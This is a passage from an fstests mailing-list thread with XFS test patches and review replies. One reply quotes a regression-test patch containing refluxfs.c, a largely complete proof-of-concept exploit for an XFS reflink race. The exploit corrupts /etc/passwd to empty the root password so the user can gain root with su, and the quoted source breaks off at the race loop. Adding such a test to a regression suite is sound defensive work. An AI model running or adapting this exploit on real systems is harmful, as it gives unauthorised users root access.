+_within_tolerance "t8 offset" $OFFSET $t8_offset 2% -v
+
+_exit 0
diff --git a/tests/xfs/1908.out b/tests/xfs/1908.out
new file mode 100644
index 00000000000000..bbc55ef31a13a0
--- /dev/null
+++ b/tests/xfs/1908.out
@@ -0,0 +1,28 @@
+QA output created by 1908
+t0 wanted range is in range
+t0 verified range is in range
+t0 offset is in range
+t1 wanted range is in range
+t1 verified range is in range
+t1 offset is in range
+t2 wanted range is in range
+t2 verified range is in range
+t2 offset is in range
+t3 wanted range is in range
+t3 verified range is in range
+t3 offset is in range
+t4 wanted range is in range
+t4 verified range is in range
+t4 offset is in range
+t5 wanted range is in range
+t5 verified range is in range
+t5 offset is in range
+t6 wanted range is in range
+t6 verified range is in range
+t6 offset is in range
+t7 wanted range is in range
+t7 verified range is in range
+t7 offset is in range
+t8 wanted range is in range
+t8 verified range is in range
+t8 offset is in range


^ permalink raw reply related	[flat|nested] 11+ messages in thread

* [PATCH 4/4] xfs: test mkfs.xfs config file generation
  2026-09-28 15:36 [PATCHSET] fstests: new tests for old features Darrick J. Wong
                   ` (2 preceding siblings ...)
  2026-09-28 15:36 ` [PATCH 3/4] xfs: basic functional testing of media verification command Darrick J. Wong
@ 2026-09-28 15:36 ` Darrick J. Wong
  3 siblings, 0 replies; 11+ messages in thread
From: Darrick J. Wong @ 2026-09-28 15:36 UTC (permalink / raw)
  To: zlang, djwong; +Cc: aalbersh, linux-xfs, fstests

From: Darrick J. Wong <djwong@kernel.org>

Test configuration file generation via mkfs, xfs_db, and xfs_spaceman.

Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
Reviewed-by: Andrey Albershteyn <aalbersh@kernel.org>
---
 tests/xfs/1909     |  163 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 tests/xfs/1909.out |    2 +
 2 files changed, 165 insertions(+)
 create mode 100755 tests/xfs/1909
 create mode 100644 tests/xfs/1909.out


diff --git a/tests/xfs/1909 b/tests/xfs/1909
new file mode 100755
index 00000000000000..d60d552f5b4863
--- /dev/null
+++ b/tests/xfs/1909
@@ -0,0 +1,163 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2026 Oracle.  All Rights Reserved.
+#
+# FS QA Test 1909
+#
+# Functional testing for mkfs.xfs config file generation.
+#
+. ./common/preamble
+_begin_fstest auto mkfs
+
+# . ./common/filter
+
+_require_scratch
+_require_xfs_mkfs_cfgfile
+_require_xfs_spaceman_command "makecfg"
+_require_xfs_db_command "makecfg"
+_require_command "$XFS_ADMIN_PROG" "xfs_admin"
+
+# t1: Make sure all three tools generate the same config file
+_scratch_mkfs >> $seqres.full
+_scratch_mount
+$XFS_SPACEMAN_PROG -c "makecfg $tmp.spaceman1" $SCRATCH_MNT
+$XFS_ADMIN_PROG -C $tmp.onadmin1 $SCRATCH_MNT
+_scratch_unmount
+
+_scratch_mkfs -c makecfg=$tmp.mkfs1 >> $seqres.full
+_scratch_xfs_db -c "makecfg $tmp.db1"
+_scratch_xfs_admin -C $tmp.offadmin1
+
+cmp -s $tmp.mkfs1 $tmp.spaceman1 || \
+	echo "mkfs config1 does not match spaceman?"
+cmp -s $tmp.db1 $tmp.spaceman1 || \
+	echo "db config1 does not match spaceman?"
+cmp -s $tmp.db1 $tmp.mkfs1 || \
+	echo "db config1 does not match mkfs?"
+cmp -s $tmp.onadmin1 $tmp.mkfs1 || \
+	echo "online admin config1 does not match mkfs?"
+cmp -s $tmp.offadmin1 $tmp.mkfs1 || \
+	echo "offline admin config1 does not match mkfs?"
+
+echo "*** spaceman config1" >> $seqres.full
+cat $tmp.spaceman1 >> $seqres.full
+echo "*** mkfs config1" >> $seqres.full
+cat $tmp.mkfs1 >> $seqres.full
+echo "*** db config1" >> $seqres.full
+cat $tmp.db1 >> $seqres.full
+echo "*** online admin config1" >> $seqres.full
+cat $tmp.onadmin1 >> $seqres.full
+echo "*** offline admin config1" >> $seqres.full
+cat $tmp.offadmin1 >> $seqres.full
+
+# t2: Make sure the output changes if we set a new rootdir inherit option
+_scratch_mount
+$XFS_IO_PROG -c 'chattr +P' -c 'chproj 33' $SCRATCH_MNT
+$XFS_SPACEMAN_PROG -c "makecfg $tmp.spaceman2" $SCRATCH_MNT
+_scratch_unmount
+_scratch_xfs_db -c "makecfg $tmp.db2"
+
+cmp -s $tmp.db2 $tmp.spaceman2 || \
+	echo "db config2 does not match spaceman?"
+cmp -s $tmp.db1 $tmp.db2 && \
+	echo "db config1 should be different from db config2"
+
+echo "*** spaceman config2" >> $seqres.full
+cat $tmp.spaceman2 >> $seqres.full
+echo "*** db config2" >> $seqres.full
+cat $tmp.db2 >> $seqres.full
+
+# t3: Format with t2 config file, make sure the results match t2 and not t1
+_scratch_mkfs -c options=$tmp.db2 >> $seqres.full
+_scratch_mount
+$XFS_SPACEMAN_PROG -c "makecfg $tmp.spaceman3" $SCRATCH_MNT
+_scratch_unmount
+_scratch_xfs_db -c "makecfg $tmp.db3"
+
+cmp -s $tmp.db3 $tmp.spaceman3 || \
+	echo "db config3 does not match spaceman?"
+cmp -s $tmp.db3 $tmp.db1 && \
+	echo "db config3 should be different from db config1"
+cmp -s $tmp.db3 $tmp.db2 || \
+	echo "db config3 does not match db config2?"
+
+echo "*** spaceman config3" >> $seqres.full
+cat $tmp.spaceman3 >> $seqres.full
+echo "*** db config3" >> $seqres.full
+cat $tmp.db3 >> $seqres.full
+
+# t4: Set autofsck filesystem property, make sure that gets reflected
+autofsck="$(grep 'autofsck=' $tmp.spaceman3 | sed -e 's/^.*autofsck=//g')"
+case "$autofsck" in
+"")
+	if grep -q 'crc=1' $tmp.spaceman3; then
+		new_autofsck=check
+	fi
+	;;
+repair) new_autofsck=check;;
+*)	new_autofsck=repair;;
+esac
+if [ -n "$new_autofsck" ]; then
+	$XFS_PROPERTY_PROG $SCRATCH_DEV set "autofsck=$new_autofsck" >> $seqres.full
+	_scratch_mount
+	$XFS_SPACEMAN_PROG -c "makecfg $tmp.spaceman4" $SCRATCH_MNT
+	_scratch_unmount
+	_scratch_xfs_db -c "makecfg $tmp.db4"
+
+	cmp -s $tmp.db4 $tmp.spaceman4 || \
+	echo "db config4 does not match spaceman?"
+	cmp -s $tmp.db4 $tmp.db3 && \
+		echo "db config4 should be different from db config3"
+
+	echo "*** spaceman config4" >> $seqres.full
+	cat $tmp.spaceman4 >> $seqres.full
+	echo "*** db config4" >> $seqres.full
+	cat $tmp.db4 >> $seqres.full
+
+	_scratch_mkfs -c options=$tmp.db4 >> $seqres.full
+	_scratch_mount
+	$XFS_SPACEMAN_PROG -c "makecfg $tmp.spaceman4a" $SCRATCH_MNT
+	_scratch_unmount
+	_scratch_xfs_db -c "makecfg $tmp.db4a"
+
+	cmp -s $tmp.db4a $tmp.spaceman4a || \
+	echo "db config4a does not match spaceman?"
+	cmp -s $tmp.db4a $tmp.db3 && \
+		echo "db config4a should be different from db config3"
+	cmp -s $tmp.db4a $tmp.db4 || \
+	echo "db config4a does not match db config4?"
+
+	echo "*** spaceman config4a" >> $seqres.full
+	cat $tmp.spaceman4a >> $seqres.full
+	echo "*** db config4a" >> $seqres.full
+	cat $tmp.db4a >> $seqres.full
+
+fi
+
+if grep -q 'reflink=1' "$tmp.db3"; then
+	# t5a: make sure that cli can override defaults
+	_scratch_mkfs -c defaults=$tmp.db3 -m reflink=0 >> $seqres.full
+	_scratch_xfs_db -c "makecfg $tmp.db5a"
+	grep -q 'reflink=0' "$tmp.db5a" || \
+		echo "db config5a should not have reflink"
+
+	echo "*** db config5a" >> $seqres.full
+	cat $tmp.db5a >> $seqres.full
+
+	# t5b: make sure that cli cannot override config file
+	_scratch_mkfs -c options=$tmp.db3 -m reflink=0 >> $seqres.full 2>> $tmp.fail
+	grep -q 'reflink option respecified' $tmp.fail || \
+		echo "mkfs should have failed on config5b"
+
+	# t5c: make sure that config file can override defaults
+	_scratch_mkfs -c options=$tmp.db3,defaults=$tmp.db3 >> $seqres.full
+	_scratch_xfs_db -c "makecfg $tmp.db5c"
+	grep -q 'reflink=1' "$tmp.db5c" || \
+		echo "db config5c should have reflink"
+
+	echo "*** db config5c" >> $seqres.full
+	cat $tmp.db5c >> $seqres.full
+fi
+
+echo Silence is golden
+_exit 0
diff --git a/tests/xfs/1909.out b/tests/xfs/1909.out
new file mode 100644
index 00000000000000..c17c5522d48db4
--- /dev/null
+++ b/tests/xfs/1909.out
@@ -0,0 +1,2 @@
+QA output created by 1909
+Silence is golden


^ permalink raw reply related	[flat|nested] 11+ messages in thread

* Re: [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output
  2026-09-28 15:36 ` [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output Darrick J. Wong
@ 2026-10-01 12:27   ` Andrey Albershteyn
  2026-10-05 12:57   ` Christoph Hellwig
  2026-10-08 14:47   ` Zorro Lang
  2 siblings, 0 replies; 11+ messages in thread
From: Andrey Albershteyn @ 2026-10-01 12:27 UTC (permalink / raw)
  To: Darrick J. Wong; +Cc: zlang, linux-xfs, fstests

On 2026-09-28 08:36:27, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
> 
> A subsequent patch will want to be able to extract the start of an
> internal rt volume from the xfs_info output, so add the necessary lines
> to _xfs_filter_mkfs to transform the output into bash variables.
> 
> Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>

Looks good to me
Reviewed-by: Andrey Albershteyn <aalbersh@kernel.org>

-- 
- Andrey

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH 3/4] xfs: basic functional testing of media verification command
  2026-09-28 15:36 ` [PATCH 3/4] xfs: basic functional testing of media verification command Darrick J. Wong
@ 2026-10-01 12:44   ` Andrey Albershteyn
  2026-10-05 12:57   ` Christoph Hellwig
  1 sibling, 0 replies; 11+ messages in thread
From: Andrey Albershteyn @ 2026-10-01 12:44 UTC (permalink / raw)
  To: Darrick J. Wong; +Cc: zlang, linux-xfs, fstests

On 2026-09-28 08:36:42, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
> 
> Implement a simple testcase to check that media verification works on
> however the scratch filesystem is configured.
> 
> Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>

Looks good to me
Reviewed-by: Andrey Albershteyn <aalbersh@kernel.org>

-- 
- Andrey

^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output
  2026-09-28 15:36 ` [PATCH 2/4] common/xfs: add zoned/rtstart info to mkfs filter output Darrick J. Wong
  2026-10-01 12:27   ` Andrey Albershteyn
@ 2026-10-05 12:57   ` Christoph Hellwig
  2026-10-08 14:47   ` Zorro Lang
  2 siblings, 0 replies; 11+ messages in thread
From: Christoph Hellwig @ 2026-10-05 12:57 UTC (permalink / raw)
  To: Darrick J. Wong; +Cc: zlang, linux-xfs, fstests

On Mon, Sep 28, 2026 at 08:36:27AM -0700, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
> 
> A subsequent patch will want to be able to extract the start of an
> internal rt volume from the xfs_info output, so add the necessary lines
> to _xfs_filter_mkfs to transform the output into bash variables.
> 
> Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>

Looks good:

Reviewed-by: Christoph Hellwig <hch@lst.de>


^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH 3/4] xfs: basic functional testing of media verification command
  2026-09-28 15:36 ` [PATCH 3/4] xfs: basic functional testing of media verification command Darrick J. Wong
  2026-10-01 12:44   ` Andrey Albershteyn
@ 2026-10-05 12:57   ` Christoph Hellwig
  1 sibling, 0 replies; 11+ messages in thread
From: Christoph Hellwig @ 2026-10-05 12:57 UTC (permalink / raw)
  To: Darrick J. Wong; +Cc: zlang, linux-xfs, fstests

On Mon, Sep 28, 2026 at 08:36:42AM -0700, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
> 
> Implement a simple testcase to check that media verification works on
> however the scratch filesystem is configured.

Looks good:

Reviewed-by: Christoph Hellwig <hch@lst.de>


^ permalink raw reply	[flat|nested] 11+ messages in thread

* Re: [PATCH 1/4] generic: regression test for refluxfs fixes
  2026-09-28 15:36 ` [PATCH 1/4] generic: regression test for refluxfs fixes Darrick J. Wong
@ 2026-10-08 14:45   ` Zorro Lang
  0 siblings, 0 replies; 11+ messages in thread
From: Zorro Lang @ 2026-10-08 14:45 UTC (permalink / raw)
  To: Darrick J. Wong; +Cc: hch, qsa, linux-xfs, fstests

On Mon, Sep 28, 2026 at 08:36:11AM -0700, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
> 
> Regression test for refluxfs as found by Qualys.
> 
> Reported-by: qsa@qualys.com
> Co-developed-by: qsa@qualys.com
> Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
> Reviewed-by: Christoph Hellwig <hch@lst.de>
> ---

Thanks Darrick, this version is good to me!

Reviewed-by: Zorro Lang <zlang@kernel.org>

>  .gitignore             |    1 
>  src/Makefile           |    2 
>  src/refluxfs.c         |  435 ++++++++++++++++++++++++++++++++++++++++++++++++
>  tests/generic/1956     |   58 ++++++
>  tests/generic/1956.out |    2 
>  5 files changed, 497 insertions(+), 1 deletion(-)
>  create mode 100644 src/refluxfs.c
>  create mode 100755 tests/generic/1956
>  create mode 100644 tests/generic/1956.out
> 
> 
> diff --git a/.gitignore b/.gitignore
> index d52ba4ad30852b..b5d85c9451f0a8 100644
> --- a/.gitignore
> +++ b/.gitignore
> @@ -126,6 +126,7 @@ tags
>  /src/pwrite_mmap_blocked
>  /src/randholes
>  /src/readdir-while-renames
> +/src/refluxfs
>  /src/rename
>  /src/renameat2
>  /src/resvtest
> diff --git a/src/Makefile b/src/Makefile
> index 0ff607ae15930d..04a73b76546241 100644
> --- a/src/Makefile
> +++ b/src/Makefile
> @@ -36,7 +36,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
>  	fscrypt-crypt-util bulkstat_null_ocount splice-test chprojid_fail \
>  	detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
>  	uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
> -	rw_hint btrfs_ioctl
> +	rw_hint btrfs_ioctl refluxfs
>  
>  EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
>  	      btrfs_crc32c_forged_name.py popdir.pl popattr.py \
> diff --git a/src/refluxfs.c b/src/refluxfs.c
> new file mode 100644
> index 00000000000000..f2d4402a940a80
> --- /dev/null
> +++ b/src/refluxfs.c
> @@ -0,0 +1,435 @@
> +/* refluxfs.c -- RefluXFS PoC (CVE-2026-XXXXX)
> + *
> + * This PoC targets /etc/passwd (always world-readable, arch-independent, easy
> + * to verify and revert).  It never opens the target for write; the corrupting
> + * DIO is issued against the attacker-owned CLONE, whose stale imap points at
> + * the target's block.  Before racing, it saves a full BYTE-COPY backup of the
> + * target (read/write -- never reflink, so it takes no refcount on the block).
> + * On success it leaves /etc/passwd modified so you can `su` (empty password),
> + * confirm uid=0, and restore from the backup.
> + *
> + * Build:  cc -O2 -pthread -o refluxfs refluxfs.c
> + * Run:    ./refluxfs                 # zero-arg defaults; safe to Ctrl-C
> + *
> + * Exit:   0  vulnerable (race fired; target left modified, backup saved)
> + *         1  precondition unmet, or runtime error (with a specific reason)
> + *         2  race did not fire (budget exhausted or interrupted)
> + */
> +#ifndef _GNU_SOURCE
> +#define _GNU_SOURCE
> +#endif
> +#include <stdio.h>
> +#include <stdlib.h>
> +#include <string.h>
> +#include <fcntl.h>
> +#include <pthread.h>
> +#include <unistd.h>
> +#include <errno.h>
> +#include <signal.h>
> +#include <stdarg.h>
> +#include <stdint.h>
> +#include <time.h>
> +#include <sys/ioctl.h>
> +#include <sys/utsname.h>
> +#include <sys/stat.h>
> +#include <sys/vfs.h>
> +#include <linux/fs.h>
> +#include <linux/magic.h>
> +#include <linux/fiemap.h>
> +#include <stdatomic.h>
> +
> +#ifndef FICLONE
> +#define FICLONE _IOW(0x94, 9, int)
> +#endif
> +
> +/* original PoC assumed 4k fsblocks, but use 64k to cover more fs geometries */
> +#define BLK 65536
> +
> +/* ---- configuration (overridable via CLI) --------------------------------- */
> +static const char *target_path   = "/etc/passwd";
> +static const char *clone_dir     = "/var/tmp";
> +static int         nr_writers    = 32;
> +static int         nr_pressure   = 8;
> +static int         budget_s      = 300;
> +
> +/* ---- state --------------------------------------------------------------- */
> +static char  workdir[512], clone_path[600], backup_path[600];
> +static int   target_fd_ro = -1;
> +static unsigned char golden[BLK];        /* first block of target, verbatim   */
> +static ssize_t golden_len;               /* == min(i_size, BLK)               */
> +static unsigned char *dio_buf;           /* BLK-aligned; every writer pwrites */
> +static int   keep_backup;                /* set on success; gates atexit()    */
> +static atomic_int  sigint;               /* set by handler; read only by main */
> +static atomic_int  stop;                 /* set by main; read by threads      */
> +static long  rounds;
> +static pthread_barrier_t bar;
> +
> +/* ---- helpers ------------------------------------------------------------- */
> +__attribute__((format(printf, 2, 3)))
> +static void say(const char *tag, const char *fmt, ...)
> +{
> +    va_list ap; va_start(ap, fmt);
> +    fprintf(stderr, "[%s] ", tag);
> +    vfprintf(stderr, fmt, ap);
> +    fprintf(stderr, "\n");
> +    va_end(ap);
> +}
> +#define OK(...)   say("+", __VA_ARGS__)
> +#define BAD(...)  say("!", __VA_ARGS__)
> +#define INFO(...) say("*", __VA_ARGS__)
> +
> +static void die(int code, const char *why, const char *hint)
> +{
> +    BAD("%s: %s", why, strerror(errno));
> +    if (hint) INFO("%s", hint);
> +    exit(code);
> +}
> +
> +static void on_signal(int sig)
> +{
> +    (void)sig;
> +    atomic_store(&sigint, 1);
> +}
> +
> +/* Registered with atexit() as soon as workdir exists; runs on every exit
> + * path (die(), preflight refusal, timeout, success).  Always removes clone
> + * and pressure files; removes backup + workdir unless the run succeeded. */
> +static void cleanup(void)
> +{
> +    unlink(clone_path);
> +    for (int i = 0; i < nr_pressure; i++) {
> +        char p[600]; snprintf(p, sizeof p, "%s/press.%d", workdir, i); unlink(p);
> +    }
> +    if (!keep_backup) {
> +        unlink(backup_path);
> +        rmdir(workdir);
> +    }
> +}
> +
> +/* ---- preflight ----------------------------------------------------------- */
> +
> +static int same_fs(const char *a, const char *b)
> +{
> +    struct stat sa, sb;
> +    if (stat(a, &sa) || stat(b, &sb)) return -1;
> +    return sa.st_dev == sb.st_dev;
> +}
> +
> +/* FIEMAP: is the target's first extent already shared (refcount > 1)?
> + * If so the race can never see refcount==1. */
> +static int target_first_extent_shared(void)
> +{
> +    union {
> +        struct fiemap fm;
> +        char raw[sizeof(struct fiemap) + sizeof(struct fiemap_extent)];
> +    } q;
> +    memset(&q, 0, sizeof q);
> +    q.fm.fm_length = BLK;
> +    q.fm.fm_flags = FIEMAP_FLAG_SYNC;
> +    q.fm.fm_extent_count = 1;
> +    if (ioctl(target_fd_ro, FS_IOC_FIEMAP, &q) < 0) return -1; /* unknown */
> +    if (q.fm.fm_mapped_extents < 1) return -1;
> +    return (q.fm.fm_extents[0].fe_flags & FIEMAP_EXTENT_SHARED) ? 1 : 0;
> +}
> +
> +static void preflight(void)
> +{
> +    struct stat st;
> +
> +    /* 1. target readable */
> +    target_fd_ro = open(target_path, O_RDONLY);
> +    if (target_fd_ro < 0)
> +        die(1, "open target O_RDONLY",
> +            "Target must be world-readable. /etc/passwd is on every distro.");
> +    if (fstat(target_fd_ro, &st)) die(1, "fstat target", NULL);
> +    golden_len = pread(target_fd_ro, golden, BLK, 0);
> +    if (golden_len < 0) die(1, "read target", NULL);
> +    OK("target %s: readable, %lld bytes (using first %zd)",
> +       target_path, (long long)st.st_size, golden_len);
> +    if (st.st_blksize != BLK)
> +        INFO("note: st_blksize=%ld != %d -- this PoC assumes 4K fs blocks "
> +             "and may false-negative otherwise.", (long)st.st_blksize, BLK);
> +
> +    /* We only assume line 1 is `root:x:...` -- universal on shadow-using Linux.
> +     * `root::...` means a previous run already emptied the password field. */
> +    if (golden_len >= 6 && !memcmp(golden, "root::", 6)) {
> +        BAD("target line 1 already has an empty password field (root::).");
> +        INFO("A previous run left it modified. Restore first (as root, or `su`):");
> +        INFO("    dd if=%s/.refluxfs-%d-PID/target.orig of=%s",
> +             clone_dir, (int)getuid(), target_path);
> +        INFO("(ls -d %s/.refluxfs-%d-*  to find the right PID directory;",
> +             clone_dir, (int)getuid());
> +        INFO(" use dd -- cp, and recent coreutils cat, may reflink.)");
> +        exit(1);
> +    }
> +    if (golden_len < 8 || memcmp(golden, "root:x:", 7) ||
> +        !memchr(golden, '\n', golden_len)) {
> +        BAD("target line 1 is not \"root:x:...\\n\" -- unexpected format.");
> +        INFO("This PoC's payload assumes the standard shadow-backed root entry.");
> +        INFO("Use -t to point at a different target or adjust the payload.");
> +        exit(1);
> +    }
> +
> +    /* 3. clone_dir on the same superblock */
> +    if (access(clone_dir, W_OK)) die(1, "clone dir not writable",
> +        "Need a writable directory on the SAME XFS filesystem as the target.");
> +    int s = same_fs(target_path, clone_dir);
> +    if (s < 0) die(1, "stat clone dir", NULL);
> +    if (!s) {
> +        BAD("clone dir %s is NOT on the same filesystem as %s (st_dev differs).",
> +            clone_dir, target_path);
> +        INFO("FICLONE returns -EXDEV across superblocks. Use -d with a writable");
> +        INFO("directory on the target's mount (findmnt -T %s).", target_path);
> +        exit(1);
> +    }
> +    OK("clone dir %s: writable, same st_dev as target", clone_dir);
> +
> +    /* 4. workdir */
> +    snprintf(workdir, sizeof workdir, "%s/.refluxfs-%d-%d",
> +             clone_dir, (int)getuid(), (int)getpid());
> +    if (mkdir(workdir, 0700) && errno != EEXIST)
> +        die(1, "mkdir workdir", NULL);
> +    snprintf(clone_path,  sizeof clone_path,  "%s/clone",       workdir);
> +    snprintf(backup_path, sizeof backup_path, "%s/target.orig", workdir);
> +    atexit(cleanup);           /* every exit() from here on cleans workdir */
> +
> +    /* Full BYTE-COPY backup of target (read/write, never FICLONE/
> +     * copy_file_range -- must not take a refcount on the target's block). */
> +    {
> +        int bfd = open(backup_path, O_WRONLY|O_CREAT|O_TRUNC, 0600);
> +        if (bfd < 0) die(1, "open backup", NULL);
> +        unsigned char buf[8192]; ssize_t n; off_t off = 0;
> +        while ((n = pread(target_fd_ro, buf, sizeof buf, off)) > 0) {
> +            if (write(bfd, buf, n) != n) die(1, "write backup", NULL);
> +            off += n;
> +        }
> +        if (n < 0) die(1, "read target for backup", NULL);
> +        fsync(bfd); close(bfd);
> +        OK("workdir %s", workdir);
> +        OK("backup  %s  (%lld bytes, byte-copy -- no reflink taken)",
> +           backup_path, (long long)off);
> +    }
> +
> +    /* 5. abort if target's first extent is already shared (checked BEFORE we
> +     *    FICLONE ourselves and create a share). */
> +    int sh = target_first_extent_shared();
> +    if (sh == 1) {
> +        BAD("target's first extent is ALREADY SHARED (FIEMAP_EXTENT_SHARED).");
> +        INFO("The race needs refcount(X) to drop to exactly 1; a pre-existing");
> +        INFO("reflink (e.g. `cp --reflink=auto` backup, coreutils >= 9.0 default)");
> +        INFO("keeps it >= 2 and the race can never fire. Reset primitive:");
> +        INFO("    chsh -s /usr/bin/bash");
> +        INFO("    (or `-s /bin/bash` if that says 'Shell not changed.'; on");
> +        INFO("     RHEL-family, chsh is in the optional util-linux-user pkg)");
> +        INFO("This rewrites /etc/passwd via rename(2) as a fresh unshared inode.");
> +        exit(1);
> +    } else if (sh == 0) {
> +        OK("target's first extent is not pre-shared (refcount==1)");
> +    } else {
> +        INFO("cannot determine sharing state via FIEMAP -- proceeding.");
> +    }
> +
> +    /* 6. FICLONE actually works (=> reflink=1) */
> +    int c = open(clone_path, O_RDWR|O_CREAT|O_TRUNC, 0600);
> +    if (c < 0) die(1, "open clone", NULL);
> +    if (ioctl(c, FICLONE, target_fd_ro) < 0) {
> +        int e = errno;
> +        BAD("FICLONE(clone <- target) failed: %s", strerror(e));
> +        if (e == EOPNOTSUPP)
> +            INFO("This XFS was made with reflink=0 (xfsprogs < 5.1.0 or explicit).");
> +        else if (e == EXDEV)
> +            INFO("Different filesystem after all -- pick another -d directory.");
> +        close(c);
> +        exit(1);
> +    }
> +    close(c);
> +    OK("FICLONE works -- filesystem has reflink=1");
> +
> +    /* 7. O_DIRECT open + one aligned pwrite actually work.  All writers share
> +     *    this one buffer -- payload never changes and pwrite() only reads it. */
> +    if ((errno = posix_memalign((void **)&dio_buf, BLK, BLK)))
> +        die(1, "posix_memalign", NULL);
> +    memset(dio_buf, 0, BLK);
> +    c = open(clone_path, O_RDWR|O_DIRECT);
> +    if (c < 0) die(1, "open clone O_DIRECT",
> +                "O_DIRECT is required to reach xfs_direct_write_iomap_begin().");
> +    if (pwrite(c, dio_buf, BLK, 0) != BLK)
> +        die(1, "O_DIRECT pwrite (alignment?)",
> +            "This PoC assumes 4K DIO alignment (default on all target distros).");
> +    close(c);
> +    OK("O_DIRECT open + %d-byte aligned pwrite work on clone", BLK);
> +}
> +
> +/* ---- race machinery ------------------------------------------------------ */
> +
> +static int reclone(void)
> +{
> +    int c = open(clone_path, O_RDWR|O_CREAT|O_TRUNC, 0600);
> +    if (c < 0) return -errno;
> +    int r = ioctl(c, FICLONE, target_fd_ro) < 0 ? -errno : 0;
> +    close(c);
> +    return r;
> +}
> +
> +static int target_changed(void)
> +{
> +    unsigned char b[BLK] = {0};
> +    /* DIO landed on disk under a different address_space; drop the target's
> +     * (stale, clean) cached page so we re-read from disk. */
> +    posix_fadvise(target_fd_ro, 0, 0, POSIX_FADV_DONTNEED);
> +    ssize_t n = pread(target_fd_ro, b, golden_len, 0);
> +    return n == golden_len && memcmp(b, golden, golden_len) != 0;
> +}
> +
> +static void *writer(void *arg)
> +{
> +    (void)arg;
> +    for (;;) {
> +        pthread_barrier_wait(&bar);          /* start of round */
> +        if (atomic_load(&stop)) break;       /* set only by main, only when
> +                                              * every writer is parked here */
> +        int fd = open(clone_path, O_RDWR|O_DIRECT);
> +        if (fd >= 0) { (void)!pwrite(fd, dio_buf, BLK, 0); close(fd); }
> +        pthread_barrier_wait(&bar);          /* end of round */
> +    }
> +    return NULL;
> +}
> +
> +static void *pressure(void *arg)
> +{
> +    char p[600];
> +    snprintf(p, sizeof p, "%s/press.%d", workdir, (int)(intptr_t)arg);
> +    int fd = open(p, O_RDWR|O_CREAT|O_TRUNC, 0600);
> +    if (fd < 0) return NULL;
> +    char b = 0;
> +    while (!atomic_load(&stop)) {
> +        /* return values irrelevant -- goal is XFS log traffic, not the data */
> +        (void)!pwrite(fd, &b, 1, 0);
> +        (void)!ftruncate(fd, BLK);
> +        fdatasync(fd);
> +        (void)!ftruncate(fd, 0);
> +    }
> +    close(fd);
> +    return NULL;
> +}
> +
> +/* ---- main ---------------------------------------------------------------- */
> +
> +static void usage(const char *argv0)
> +{
> +    fprintf(stderr,
> +      "usage: %s [-t target] [-d clone-dir] [-s seconds] [-w writers] [-p pressure]\n"
> +      "  -t  target file            (default /etc/passwd; line 1 must be root:x:...)\n"
> +      "  -d  clone/work directory   (default /var/tmp; must be writable, same XFS as -t)\n"
> +      "  -s  budget in seconds      (default 300)\n"
> +      "  -w  concurrent DIO writers (default 32)\n"
> +      "  -p  log-pressure threads   (default 8)\n",
> +      argv0);
> +}
> +
> +int main(int argc, char **argv)
> +{
> +    int opt;
> +    while ((opt = getopt(argc, argv, "t:d:s:w:p:h")) != -1) switch (opt) {
> +        case 't': target_path = optarg; break;
> +        case 'd': clone_dir   = optarg; break;
> +        case 's': budget_s    = atoi(optarg); if (budget_s    < 1) budget_s    = 1; break;
> +        case 'w': nr_writers  = atoi(optarg); if (nr_writers  < 2) nr_writers  = 2; break;
> +        case 'p': nr_pressure = atoi(optarg); if (nr_pressure < 0) nr_pressure = 0; break;
> +        default:  usage(argv[0]); return 1;
> +    }
> +
> +    struct utsname un;
> +    uname(&un);
> +    INFO("RefluXFS PoC -- kernel %s", un.release);
> +
> +    /* Install handlers BEFORE preflight so Ctrl-C after workdir/clone creation
> +     * still reaches atexit(cleanup) instead of leaving a reflinked clone (which
> +     * would keep the target's extent SHARED and defeat every later run). */
> +    signal(SIGINT,  on_signal);
> +    signal(SIGTERM, on_signal);
> +
> +    preflight();
> +
> +    /* Payload: surgical edit of line 1 only.  `root:x:...\n` -> `root::...\n\n`.
> +     * Shift the byte range [6, nl] one position left over the `x`; the
> +     * original `\n` at position nl is untouched, so we get two consecutive
> +     * newlines and every byte from line 2 onward stays at its ORIGINAL
> +     * offset -- correct for any file size, no entry straddles a boundary. */
> +    memcpy(dio_buf, golden, golden_len);
> +    ssize_t nl = 0;
> +    while (nl < golden_len && golden[nl] != '\n') nl++;
> +    memmove(dio_buf + 5, dio_buf + 6, (size_t)nl - 5);   /* nl>=7 by preflight */
> +
> +    /* threads */
> +    if ((errno = pthread_barrier_init(&bar, NULL, nr_writers + 1)))
> +        die(1, "pthread_barrier_init", NULL);
> +    pthread_t *tw = calloc(nr_writers,  sizeof *tw);
> +    pthread_t *tp = calloc(nr_pressure ? nr_pressure : 1, sizeof *tp);
> +    if (!tw || !tp) { BAD("calloc: out of memory"); exit(1); }
> +    for (int i = 0; i < nr_writers;  i++)
> +        if ((errno = pthread_create(&tw[i], NULL, writer, NULL)))
> +            die(1, "pthread_create writer", NULL);
> +    for (int i = 0; i < nr_pressure; i++)
> +        if ((errno = pthread_create(&tp[i], NULL, pressure, (void*)(intptr_t)i)))
> +            die(1, "pthread_create pressure", NULL);
> +
> +    /* Race: reclone -> release all writers -> check target -> repeat. */
> +    INFO("racing: %d writers + %d log-pressure threads, up to %ds ...",
> +         nr_writers, nr_pressure, budget_s);
> +    struct timespec t0, t; clock_gettime(CLOCK_MONOTONIC, &t0);
> +    int rc = 2, e;
